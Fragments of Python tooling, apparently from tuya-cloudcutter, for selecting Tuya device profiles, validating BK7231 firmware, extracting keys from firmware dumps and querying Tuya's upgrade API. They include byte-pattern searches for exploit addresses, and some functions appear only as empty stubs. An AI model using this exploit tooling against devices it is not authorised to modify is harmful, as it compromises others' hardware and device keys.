from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def cli(ctx, workdir: str, output: click.File):
ctx.ensure_object(dict)
ctx.obj["firmware_dir"] = join(workdir, "custom-firmware")
ctx.obj["profiles_dir"] = join(workdir, "device-profiles")
ctx.obj["output"] = output | null |
188,506 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def download_profile(device_slug):
def save_profile(profile_dir, device, profile):
def load_profile(profile_dir):
def save_combined_profile(profile_dir, device, profile):
def write_profile(ctx, slug: str):
device_slug = slug
profiles_dir = ctx.obj["profiles_dir"]
profile_dir = join(profiles_dir, device_slug)
# try to find device and profile JSON files
device, profile = None, None
if isdir(profile_dir):
device, profile = load_profile(profile_dir)
if device is None or profile is None:
print(
"Custom device or profile is not present, "
"attempting to download from API."
)
if device is None or profile is None:
device, profile = download_profile(device_slug)
save_profile(profile_dir, device, profile)
# write profile data if found
path = save_combined_profile(profile_dir, device, profile)
ctx.obj["output"].write(path) | null |
188,507 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
def api_get(path):
with requests.get(f"https://tuya-cloudcutter.github.io/api/{path}") as r:
if r.status_code == 404:
print("The specified device does not exist in the API.")
exit(1)
if r.status_code != 200:
print("API request failed. Make sure you have an Internet connection.")
exit(1)
return r.json()
def ask_options(text, options):
res = inquirer.prompt(
[
inquirer.List(
"result",
carousel=True,
message=text,
choices=options,
)
]
)
if res is None:
# Ctrl+C
exit(1)
return res["result"]
def ask_dirs(text, dir):
files = [
path
for path in listdir(dir)
if not path.startswith(".") and isdir(join(dir, path)) and path != "schema"
]
path = ask_options(text, sorted(files, key=str.casefold))
return abspath(join(dir, path))
def ask_device_base(devices):
brands = sorted(set(device["manufacturer"] for device in devices))
manufacturer = ask_options("Select the brand of your device", brands)
names = sorted(
set(
device["name"]
for device in devices
if device["manufacturer"] == manufacturer
)
)
name = ask_options("Select the article number of your device", names)
return next(
device
for device in devices
if device["manufacturer"] == manufacturer and device["name"] == name
)
def ask_profile_base(profiles):
profiles = {
f"{profile['name']} / {profile['sub_name']}": profile
for profile in profiles
if profile["type"] == "CLASSIC"
}
names = sorted(set(profiles.keys()))
name = ask_options("Select the firmware version and name", names)
return profiles[name]
def save_profile(profile_dir, device, profile):
makedirs(profile_dir, exist_ok=True)
with open(join(profile_dir, "device.json"), "w") as f:
json.dump(device, f, indent="\t")
with open(join(profile_dir, "profile.json"), "w") as f:
json.dump(profile, f, indent="\t")
def load_profile(profile_dir):
device, profile = None, None
for file in glob(join(profile_dir, "*.json")):
with open(file, "r") as f:
try:
data = json.load(f)
except:
print(
f"File {file} does not contain valid JSON. "
"Please update your file and try again."
)
exit(53)
# match characteristic keys
if "profiles" in data:
device = data
continue
if "firmware" in data:
profile = data
continue
if device and profile:
break
return device, profile
def save_combined_profile(profile_dir, device, profile):
makedirs(profile_dir, exist_ok=True)
combined = {
"slug": basename(profile_dir),
"device": device,
"profile": profile,
}
combined_path = join(profile_dir, "combined.json")
with open(combined_path, "w") as f:
json.dump(combined, f, indent="\t")
return abspath(combined_path)
def choose_profile(ctx, flashing: bool = False):
profiles_dir = ctx.obj["profiles_dir"]
device_slug = None
opts = [
"By manufacturer/device name",
"By firmware version and name",
"From device-profiles (i.e. custom profile)",
]
mode = ask_options("How do you want to choose the device?", opts)
if mode == opts[0]:
device_slug = ask_device_base(api_get("devices.json"))["slug"]
device = api_get(f"devices/{device_slug}.json")
profiles = device["profiles"]
profile_slug = ask_profile_base(profiles)["slug"]
profile = api_get(f"profiles/{profile_slug}.json")
elif mode == opts[1]:
profile_slug = ask_profile_base(api_get("profiles.json"))["slug"]
profile = api_get(f"profiles/{profile_slug}.json")
devices = profile["devices"]
if flashing:
device_slug = devices[0]["slug"]
else:
device_slug = ask_device_base(devices)["slug"]
device = api_get(f"devices/{device_slug}.json")
elif mode == opts[2]:
profile_dir = ask_dirs("Select device profile", profiles_dir)
device, profile = load_profile(profile_dir)
else:
exit(2)
if device_slug is not None:
profile_dir = join(profiles_dir, device_slug)
save_profile(profile_dir, device, profile)
path = save_combined_profile(profile_dir, device, profile)
ctx.obj["output"].write(path) | null |
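load_profile above tells the two JSON files apart purely by their characteristic top-level keys: a device file carries "profiles", a profile file carries "firmware". A minimal sketch with hypothetical file contents:

device = {"manufacturer": "Tuya Generic", "name": "Example Device", "profiles": ["example-profile"]}
profile = {"name": "1.0.0 - BK7231T", "type": "CLASSIC", "firmware": {"chip": "BK7231T", "version": "1.0.0"}}
def classify(data: dict) -> str:
    # same characteristic-key test load_profile uses
    if "profiles" in data:
        return "device"
    if "firmware" in data:
        return "profile"
    return "unknown"
print(classify(device), classify(profile))  # device profile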
188,508 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
UF2_UG_SUFFIX = "-extracted.ug.bin"
class FirmwareType(Enum):
    INVALID = 0
    IGNORED_HEADER = 1
    IGNORED_FILENAME = 2
    VALID_UG = 3
    VALID_UF2 = 4
def ask_options(text, options):
def validate_firmware_file_internal(firmware: str, chip: str = None) -> FirmwareType:
def extract_uf2(file_with_path: str, firmware_dir: str, chip: str) -> str:
def choose_firmware(ctx, chip: str = None):
chip = chip and chip.upper()
firmware_dir = ctx.obj["firmware_dir"]
files = listdir(firmware_dir)
options = {}
invalid_filenames = {}
for file in files:
if file.startswith(".") or file.endswith(".md"):
continue
if file.endswith(UF2_UG_SUFFIX):
continue
path = join(firmware_dir, file)
fw_type = validate_firmware_file_internal(path, chip and chip.lower())
if fw_type in [FirmwareType.VALID_UG, FirmwareType.VALID_UF2]:
options[file] = fw_type
elif fw_type in [FirmwareType.INVALID]:
invalid_filenames[file] = file
if not options:
print(
"No valid custom firmware files were found!\n"
"Add files to the custom-firmware/ directory first.",
file=sys.stderr,
)
exit(1)
if invalid_filenames:
print("\nThe following files were ignored because they do not meet naming requirements and the chip type could not be determined:")
for invalid_filename in invalid_filenames:
print(invalid_filename)
print("Please see https://github.com/tuya-cloudcutter/tuya-cloudcutter/tree/main/custom-firmware#naming-rules for more information.\n")
prompt = "Select your custom firmware file"
if chip:
prompt += f" for {chip} chip"
file = ask_options(prompt, sorted(options.keys(), key=str.casefold))
file_with_path = abspath(join(firmware_dir, file))
fw_type = options[file]
if fw_type == FirmwareType.VALID_UF2:
file_with_path = extract_uf2(file_with_path, firmware_dir, chip)
ctx.obj["output"].write(basename(file_with_path)) | null |
188,509 | import json
import sys
from enum import Enum
from glob import glob
from os import listdir, makedirs
from os.path import abspath, basename, isdir, isfile, join
import click
import inquirer
import requests
class FirmwareType(Enum):
INVALID = 0
IGNORED_HEADER = 1
IGNORED_FILENAME = 2
VALID_UG = 3
    VALID_UF2 = 4
UF2_UG_SUFFIX = "-extracted.ug.bin"
def validate_firmware_file_internal(firmware: str, chip: str = None) -> FirmwareType:
FILE_MAGIC_DICT = {
b"RBL\x00": "RBL",
b"\x43\x09\xb5\x96": "QIO",
b"\x2f\x07\xb5\x94": "UA",
b"\x55\xAA\x55\xAA": "UG",
b"UF2\x0A": "UF2",
}
base = basename(firmware)
with open(firmware, "rb") as fs:
header = fs.read(512)
magic = header[0:4]
if magic not in FILE_MAGIC_DICT or len(header) < 512:
print(
f"!!! Unrecognized file type - '{base}' is not a UG or UF2 file.",
file=sys.stderr,
)
return FirmwareType.INVALID
file_type = FILE_MAGIC_DICT[magic]
if file_type not in ["UG", "UF2"]:
print(
f"!!! File {base} is a '{file_type}' file! Please provide an UG file.",
file=sys.stderr,
)
return FirmwareType.INVALID
if file_type == "UG":
# check LibreTiny UG version tag (chip type)
rbl_ver = header[32 + 12 + 16 : 32 + 12 + 16 + 24]
if b"bk7231" in rbl_ver:
if chip and chip.encode() not in rbl_ver:
# wrong chip type
return FirmwareType.IGNORED_HEADER
# correct chip type
return FirmwareType.VALID_UG
# check chip by filename
if "bk7231" in base.lower():
if chip and chip not in base.lower():
# wrong chip type
return FirmwareType.IGNORED_FILENAME
# correct chip type
return FirmwareType.VALID_UG
print(
f"!!! Can't verify chip type of UG file '{base}' - "
"make sure that BK7231T or BK7231N is present in the filename!",
file=sys.stderr,
)
return FirmwareType.INVALID
if file_type == "UF2":
if not chip:
return FirmwareType.IGNORED_HEADER
try:
from ltchiptool import get_version
from uf2tool.models import Block
except (ImportError, ModuleNotFoundError) as e:
print(
f"!!! Can't read file '{base}' because ltchiptool is not installed. "
"Ignoring UF2 file.",
file=sys.stderr,
)
return FirmwareType.INVALID
get_version()
block = Block()
block.decode(header)
if UF2_FAMILY_MAP[chip] != block.family.id:
return FirmwareType.IGNORED_HEADER
return FirmwareType.VALID_UF2
def extract_uf2(file_with_path: str, firmware_dir: str, chip: str) -> str:
target = file_with_path + "-" + chip.lower() + UF2_UG_SUFFIX
print(f"Extracting UF2 package as '{basename(target)}'")
from ltchiptool.util.intbin import inttobe32
from uf2tool import OTAScheme, UploadContext
from uf2tool.models import UF2
with open(file_with_path, "rb") as f:
uf2 = UF2(f)
uf2.read()
uctx = UploadContext(uf2)
# BK7231 is single-OTA
data = uctx.collect_data(OTAScheme.DEVICE_SINGLE)
if len(data) != 1:
print("!!! Incompatible UF2 package - got too many chunks!")
exit(2)
_, io = data.popitem()
rbl = io.read()
file_with_path = abspath(join(firmware_dir, target))
with open(file_with_path, "wb") as f:
# build Tuya UG header
header = b"\x55\xAA\x55\xAA"
header += b"1.0.0".ljust(12, b"\x00")
header += inttobe32(len(rbl))
header += inttobe32(sum(rbl))
header += inttobe32(sum(header))
header += b"\xAA\x55\xAA\x55"
f.write(header)
# write RBL data
f.write(rbl)
return file_with_path
"-w",
"--workdir",
type=click.Path(exists=True, file_okay=False),
required=True,
def validate_firmware_file(ctx, filename: str, chip: str = None):
chip = chip and chip.upper()
firmware_dir = ctx.obj["firmware_dir"]
fw_type = validate_firmware_file_internal(join(firmware_dir, filename), chip and chip.lower())
if fw_type not in [FirmwareType.VALID_UG, FirmwareType.VALID_UF2]:
print(
f"The firmware file supplied ({filename}) is not valid for the chosen profile type of {chip}",
file=sys.stderr,
)
exit(1)
file_with_path = abspath(join(firmware_dir, filename))
if fw_type == FirmwareType.VALID_UF2:
file_with_path = extract_uf2(file_with_path, firmware_dir, chip)
ctx.obj["output"].write(basename(file_with_path)) | null |
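For reference, the Tuya UG header that extract_uf2 assembles is 32 bytes. The standalone sketch below mirrors the same field order; the & 0xFFFFFFFF masks are an added assumption so the byte sums always fit their 4-byte fields, and struct.pack(">I", ...) stands in for ltchiptool's inttobe32:

import struct
def build_ug_header(rbl: bytes, version: bytes = b"1.0.0") -> bytes:
    # magic, 12-byte version, payload length, payload byte-sum, header byte-sum, tail magic
    header = b"\x55\xAA\x55\xAA"
    header += version.ljust(12, b"\x00")
    header += struct.pack(">I", len(rbl))
    header += struct.pack(">I", sum(rbl) & 0xFFFFFFFF)
    header += struct.pack(">I", sum(header) & 0xFFFFFFFF)
    header += b"\xAA\x55\xAA\x55"
    return header
print(len(build_ug_header(b"\x00" * 64)))  # 32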
188,510 | import json
import os.path
import sys
def dump(file):
def run(storage_file: str):
if not storage_file:
print('Usage: python parse_storage.py <storage.json file>')
sys.exit(1)
if os.path.exists(storage_file):
dump(storage_file)
else:
print('[!] Storage file not found')
return | null |
188,511 | import re
import sys
from os.path import basename, dirname, exists
def dump():
global base_name, base_folder
base_name = basename(appcode_path)[:-23]
base_folder = dirname(appcode_path)
sdk_line = ''
if b'< TUYA IOT SDK' in appcode:
sdk_line = read_until_null_or_newline(appcode.index(b'< TUYA IOT SDK'))
sdk_version = sdk_line.split()[4].split(':')[1]
print(f"[+] SDK: {sdk_version}")
with open(name_output_file("sdk"), 'w') as f:
f.write(sdk_version)
device_class_search_keys = [
b'oem_bk7231s_',
b'bk7231t_common_',
b'bk7231s_',
b'oem_bk7231n_',
b'bk7231n_common_',
b'_common_ty'
]
device_class = ''
for searchKey in device_class_search_keys:
device_class = find_device_class(searchKey)
if device_class != '':
break
if device_class == '':
device_class = search_device_class_after_compiled_line()
if device_class == '':
device_class = search_device_class_after_chipid("bk7231n")
if device_class == '':
device_class = search_device_class_after_chipid("BK7231NL")
if device_class == '':
device_class = search_device_class_after_chipid("bk7231t")
if device_class != '':
print(f"[+] Device class: {device_class}")
with open(name_output_file("device_class"), 'w') as f:
f.write(device_class)
if 'light_ty' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('lightbulb-outline')
elif '_plug' in device_class or '_dltj' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('power-plug')
elif 'strip' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('string-lights')
elif 'switch' in device_class:
with open(name_output_file("icon"), 'w') as f:
f.write('toggle-switch-outline')
else:
with open(name_output_file("icon"), 'w') as f:
f.write('memory')
else:
print("[!] Unable to determine device class, please open an issue and include the bin file.")
# If swv doesn't exist from storage
if exists(name_output_file("swv")) == False:
swv = search_swv_after_compiled_line()
if swv == '':
swv = search_swv_after_device_class(device_class)
if swv != '':
print(f"[+] Version: {swv}")
with open(name_output_file("swv"), 'w') as f:
f.write(swv)
# If bv doesn't exist from storage
if exists(name_output_file("bv")) == False:
bv = sdk_line.split()[5].split('_')[0].split(':')[1]
if bv is not None and bv != '':
print(f"[+] bv: {bv}")
with open(name_output_file("bv"), 'w') as f:
f.write(bv)
# If key doesn't exist from storage
if exists(name_output_file("firmware_key")) == False:
key = search_key()
if key is not None and key != '':
print(f"[+] firmware_key: {key}")
with open(name_output_file("firmware_key"), 'w') as f:
f.write(key)
def run(device_folder: str):
if not device_folder:
print('Usage: python parse_app.py <decrypted app file>')
sys.exit(1)
global appcode_path, appcode
appcode_path = device_folder
with open(appcode_path, 'rb') as fs:
appcode = fs.read()
dump() | null |
188,512 | import argparse
import os
import os.path
import sys
import bk7231tools
def load_file(filename: str):
def run(full_encrypted_file: str):
if full_encrypted_file is None or full_encrypted_file == '':
print('Usage: python extract.py <full 2M encrypted bin file>')
sys.exit(1)
if not full_encrypted_file.__contains__('_') or full_encrypted_file.__contains__(' ') or not full_encrypted_file.endswith('.bin'):
print('Filename must match specific rules in order to properly generate a useful profile.')
print('The general format is Manufacturer-Name_Model-Number.bin')
print('manufacturer name followed by underscore (_) followed by model are required, and the extension should be .bin')
print('Dashes (-) should be used instead of spaces, and if there is a dash (-) in any part of the manufacturer or model, it must be replaced with 3 dashes (---) to be maintained.')
print('There should only be one underscore (_) present, separating manufacturer name and model')
print('Example: a Tuya Generic DS-101 would become Tuya-Generic_DS---101.bin')
print('Adding the general device type to the end of the model is recommended.')
print('Examples: Tuya-Generic_DS---101-Touch-Switch.bin or Tuya-Generic_A60-E26-RGBCT-Bulb.bin')
sys.exit(1)
global current_dir, extractfolder, foldername
current_dir = os.path.dirname(full_encrypted_file)
output_dir = full_encrypted_file.replace('.bin', '')
extractfolder = os.path.abspath(output_dir)
foldername = os.path.basename(output_dir)
input = argparse.ArgumentParser()
input.layout = 'ota_1'
input.rbl = ''
input.file = full_encrypted_file
input.output_dir = os.path.join(extractfolder)
input.extract = True
input.storage = False
if not os.path.exists(extractfolder) or not os.path.exists(os.path.join(extractfolder, foldername + "_app_1.00_decrypted.bin")):
bk7231tools.__main__.dissect_dump_file(input)
dirListing = os.listdir(extractfolder)
for file in dirListing:
if file.endswith('app_pattern_scan.bin'):
os.rename(os.path.join(extractfolder, file), os.path.join(extractfolder, file.replace('app_pattern_scan.bin', 'app_1.00.bin')))
elif file.endswith('app_pattern_scan_decrypted.bin'):
os.rename(os.path.join(extractfolder, file), os.path.join(extractfolder, file.replace('app_pattern_scan_decrypted.bin', 'app_1.00_decrypted.bin')))
issue = load_file("issue.txt")
if issue is not None:
with open(os.path.join(extractfolder, foldername + "_issue.txt"), 'w') as issueFile:
issueFile.write(issue)
image = load_file("image.jpg")
if image is not None:
with open(os.path.join(extractfolder, foldername + "_image.jpg"), 'wb') as imageFile:
imageFile.write(image)
schemaId = load_file("schema_id.txt")
if schemaId is not None:
with open(os.path.join(extractfolder, foldername + "_schema_id.txt"), 'w') as schemaIdFile:
schemaIdFile.write(schemaId)
schema = load_file("schema.txt")
if schema is not None:
with open(os.path.join(extractfolder, foldername + "_schema.txt"), 'w') as schemaFile:
schemaFile.write(schema)
storage = load_file("storage.json")
if storage is not None:
with open(os.path.join(extractfolder, foldername + "_storage.json"), 'w') as storageFile:
storageFile.write(storage)
user_param_key = load_file("user_param_key.json")
if user_param_key is not None:
with open(os.path.join(extractfolder, foldername + "_user_param_key.json"), 'w') as userParamKeyFile:
userParamKeyFile.write(user_param_key)
else:
print('[+] Encrypted bin has already been extracted')
return | null |
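The filename rules checked at the top of run() boil down to a small encoding. make_dump_filename below is a hypothetical helper, not part of the tool; it only illustrates the convention the messages above describe:

def make_dump_filename(manufacturer: str, model: str) -> str:
    # literal dashes become "---", spaces become "-", a single "_" joins the two parts
    def encode(part: str) -> str:
        return part.replace("-", "---").replace(" ", "-")
    return f"{encode(manufacturer)}_{encode(model)}.bin"
print(make_dump_filename("Tuya Generic", "DS-101 Touch Switch"))
# Tuya-Generic_DS---101-Touch-Switch.bin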
188,513 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def print_help():
print('Usage: python check_upgrade.py --input <uuid> <auth_key> <dev_id> <sec_key> <token>')
print(' or: python check_upgrade.py --directory <directory> <token>')
sys.exit(1) | null |
188,514 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, dev_id: str, sec_key: str, token: str = None):
if uuid is None or len(uuid) != 16:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if dev_id is None or len(dev_id) != 22:
print_and_exit('required dev_id was not found or was invalid (expected 22 characters)')
if sec_key is None or len(sec_key) != 16:
print_and_exit('required sec_key was not found or was invalid (expected 16 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregon Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} uuid: {uuid} sec_key: {sec_key}')
# tuya.device.upgrade.get encrypts with sec_key
connection = TuyaAPIConnection(uuid, sec_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, dev_id)
response = None
requestType = "POST"
data = build_data(epoch_time)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
if response.get('result') is not None:
version = response['result']['version']
url = response['result']['url']
print("[+] Firmware update available:")
print(f"[+] Version: {version}")
print(f"[+] Url: {url}")
with open(os.path.join(directory, output_file_prefix + f"_firmware_{version}.txt"), 'w') as f:
f.write(url)
else:
print("[+] No firmware update available.")
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_input(uuid, auth_key, dev_id, sec_key, token=None):
run('.\\', 'device', uuid, auth_key, dev_id, sec_key, token) | null |
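The token-prefix-to-region branching above (repeated in the related scripts) amounts to a lookup table. A sketch with a made-up 14-character token:

REGION_BY_TOKEN_PREFIX = {"AZ": "us", "UE": "us", "EU": "eu", "AY": "cn", "IN": "in"}
def region_from_token(token: str) -> str:
    prefix = token[:2]
    if prefix not in REGION_BY_TOKEN_PREFIX:
        raise ValueError(f"Unable to determine region from token prefix {prefix!r}")
    return REGION_BY_TOKEN_PREFIX[prefix]
print(region_from_token("AZ0123456789ab"))  # us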
188,515 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def read_single_line_file(path):
with open(path, 'r') as file:
fileContents = file.read()
if fileContents.__contains__('\n'):
return None
return fileContents
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, dev_id: str, sec_key: str, token: str = None):
if uuid is None or len(uuid) != 16:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if dev_id is None or len(dev_id) != 22:
print_and_exit('required dev_id was not found or was invalid (expected 22 characters)')
if sec_key is None or len(sec_key) != 16:
print_and_exit('required sec_key was not found or was invalid (expected 16 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregon Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} uuid: {uuid} sec_key: {sec_key}')
# tuya.device.upgrade.get encrypts with sec_key
connection = TuyaAPIConnection(uuid, sec_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, dev_id)
response = None
requestType = "POST"
data = build_data(epoch_time)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
if response.get('result') is not None:
version = response['result']['version']
url = response['result']['url']
print("[+] Firmware update available:")
print(f"[+] Version: {version}")
print(f"[+] Url: {url}")
with open(os.path.join(directory, output_file_prefix + f"_firmware_{version}.txt"), 'w') as f:
f.write(url)
else:
print("[+] No firmware update available.")
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_directory(directory, token=None):
uuid = None
auth_key = None
dev_id = None
sec_key = None
output_file_prefix = None
dirListing = os.listdir(f'{directory}')
for file in dirListing:
if file.endswith('_uuid.txt'):
uuid = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_auth_key.txt'):
auth_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_dev_id.txt'):
dev_id = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_sec_key.txt'):
sec_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_chip.txt'):
output_file_prefix = file.replace('_chip.txt', '')
if uuid is None:
print('[!] uuid was not found')
return
if auth_key is None:
print('[!] auth_key was not found')
return
if dev_id is None:
print('[!] dev_id was not found')
return
if sec_key is None:
print('[!] sec_key was not found')
return
run(directory, output_file_prefix, uuid, auth_key, dev_id, sec_key, token) | null |
188,516 | import json
import os
import os.path
import sys
full_path: str
base_name: str
def assemble():
if os.path.exists(full_path) == False:
print("[!] Unable to find device directory name")
return
# All should have these
manufacturer = base_name.split('_')[0].replace('-', ' ').replace(" ", "-")
name = base_name.split('_')[1].replace('-', ' ').replace(" ", "-")
device_class = load_file("device_class.txt")
chip = load_file("chip.txt")
sdk = load_file("sdk.txt")
bv = load_file("bv.txt")
# uuid = load_file("uuid.txt")
ap_ssid = load_file("ap_ssid.txt")
# auth_key = load_file("auth_key.txt")
address_finish = load_file("address_finish.txt")
icon = load_file("icon.txt")
if address_finish is None:
print("[!] Directory has not been fully processed, unable to generate classic profile")
return
# Optional items
swv = load_file("swv.txt")
if swv is None:
swv = "0.0.0"
product_key = load_file("product_key.txt")
firmware_key = load_file("firmware_key.txt")
address_datagram = load_file("address_datagram.txt")
address_ssid = load_file("address_ssid.txt")
address_ssid_padding = load_file("address_ssid_padding.txt")
address_passwd = load_file("address_passwd.txt")
schema_id = load_file("schema_id.txt")
schema = load_file("schema.txt")
if schema is not None and schema != '':
schema = json.loads(schema)
issue = load_file("issue.txt")
image = load_file("image.jpg")
device_configuration = load_file("user_param_key.json")
profile = {}
firmware = {}
data = {}
profile["name"] = f"{swv} - {chip}"
profile["sub_name"] = device_class
profile["type"] = "CLASSIC"
profile["icon"] = icon
firmware["chip"] = chip
firmware["name"] = device_class
firmware["version"] = swv
firmware["sdk"] = f"{sdk}-{bv}"
if firmware_key is not None:
firmware["key"] = firmware_key
profile["firmware"] = firmware
data["address_finish"] = address_finish
if address_datagram is not None:
data["address_datagram"] = address_datagram
if address_ssid is not None:
data["address_ssid"] = address_ssid
if address_ssid_padding is not None:
data["address_ssid_padding"] = int(address_ssid_padding)
if address_passwd is not None:
data["address_passwd"] = address_passwd
profile["data"] = data
if not os.path.exists(os.path.join(full_path, "profile-classic")):
os.makedirs(os.path.join(full_path, "profile-classic"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "devices")):
os.makedirs(os.path.join(full_path, "profile-classic", "devices"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "images")):
os.makedirs(os.path.join(full_path, "profile-classic", "images"))
if not os.path.exists(os.path.join(full_path, "profile-classic", "profiles")):
os.makedirs(os.path.join(full_path, "profile-classic", "profiles"))
classic_profile_name = f"{device_class.replace('_', '-')}-{swv}-sdk-{sdk}-{bv}".lower()
print(f"[+] Creating classic profile {classic_profile_name}")
with open(os.path.join(full_path, "profile-classic", "profiles", f"{classic_profile_name}.json"), 'w') as f:
f.write(json.dumps(profile, indent='\t'))
f.write('\n')
device = {}
device["manufacturer"] = manufacturer
device["name"] = name
device_filename = f"{manufacturer.replace(' ', '-')}-{name.replace(' ', '-')}".lower()
# this won't be used in exploiting, but it is useful to have a known one
# in case we need to regenerate schemas from Tuya's API
# device["uuid"] = uuid
# device["auth_key"] = auth_key
if product_key is not None:
device["key"] = product_key
device["ap_ssid"] = ap_ssid
device["github_issues"] = []
if issue is not None:
device["github_issues"].append(int(issue))
device["image_urls"] = []
if image is not None:
device["image_urls"].append(device_filename + ".jpg")
device["profiles"] = [classic_profile_name]
if schema_id is not None and schema is not None:
schema_dict = {}
schema_dict[f"{schema_id}"] = schema
device["schemas"] = schema_dict
else:
print("[!] Schema is not present, unable to generate classic device file")
return
if device_configuration is not None:
device["device_configuration"] = json.loads(device_configuration)
print(f"[+] Creating device profile {device_filename}")
with open(os.path.join(full_path, "profile-classic", "devices", f"{device_filename}.json"), 'w') as f:
f.write(json.dumps(device, indent='\t'))
f.write('\n')
if image is not None:
with open(os.path.join(full_path, "profile-classic", "images", f"{device_filename}.jpg"), 'wb') as f:
f.write(image)
def run(processed_directory: str):
global full_path, base_name
full_path = processed_directory
base_name = os.path.basename(os.path.normpath(full_path))
assemble()
return | null |
188,517 | import os.path
import sys
def walk_app_code():
print(f"[+] Searching for known exploit patterns")
if b'TUYA' not in appcode:
raise RuntimeError('[!] App binary does not appear to be correctly decrypted, or has no Tuya references.')
# Older versions of BK7231T, BS version 30.04, SDK 2.0.0
if b'TUYA IOT SDK V:2.0.0 BS:30.04' in appcode and b'AT 8710_2M' in appcode:
# 04 1e 2c d1 11 9b is the byte pattern for datagram payload
# 3 matches, 2nd is correct
# 2b 68 30 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231T", "SDK 2.0.0 8710_2M", "datagram", 0, "041e2cd1119b", 1, 0, "2b68301c9847", 1, 0)
return
# Older versions of BK7231T, BS version 30.05/30.06, SDK 2.0.0
if (b'TUYA IOT SDK V:2.0.0 BS:30.05' in appcode or b'TUYA IOT SDK V:2.0.0 BS:30.06' in appcode) and b'AT 8710_2M' in appcode:
# 04 1e 07 d1 11 9b 21 1c 00 is the byte pattern for datagram payload
# 3 matches, 2nd is correct
# 2b 68 30 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231T", "SDK 2.0.0 8710_2M", "datagram", 0, "041e07d1119b211c00", 3, 1, "2b68301c9847", 1, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 1.0.x, nobt
if b'TUYA IOT SDK V:1.0.' in appcode and b'AT bk7231t_nobt' in appcode:
# b5 4f 06 1e 07 d1 is the byte pattern for datagram payload
# 1 match should be found
# 23 68 38 1c 98 47 is the byte pattern for finish address
# 2 matches should be found, 1st is correct
process_generic("BK7231T", "SDK 1.0.# nobt", "datagram", 0, "b54f061e07d1", 1, 0, "2368381c9847", 2, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 1.0.x
if b'TUYA IOT SDK V:1.0.' in appcode and b'AT bk7231t' in appcode:
# a1 4f 06 1e is the byte pattern for datagram payload
# 1 match should be found
# 23 68 38 1c 98 47 is the byte pattern for finish address
# 2 matches should be found, 1st is correct
process_generic("BK7231T", "SDK 1.0.#", "datagram", 0, "a14f061e", 1, 0, "2368381c9847", 2, 0)
return
# Newer versions of BK7231T, BS 40.00, SDK 2.3.0
if b'TUYA IOT SDK V:2.3.0' in appcode and b'AT bk7231t' in appcode:
# 04 1e 08 d1 4d 4b is the byte pattern for datagram payload
# 1 match should be found
# 7b 69 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found, 1st is correct
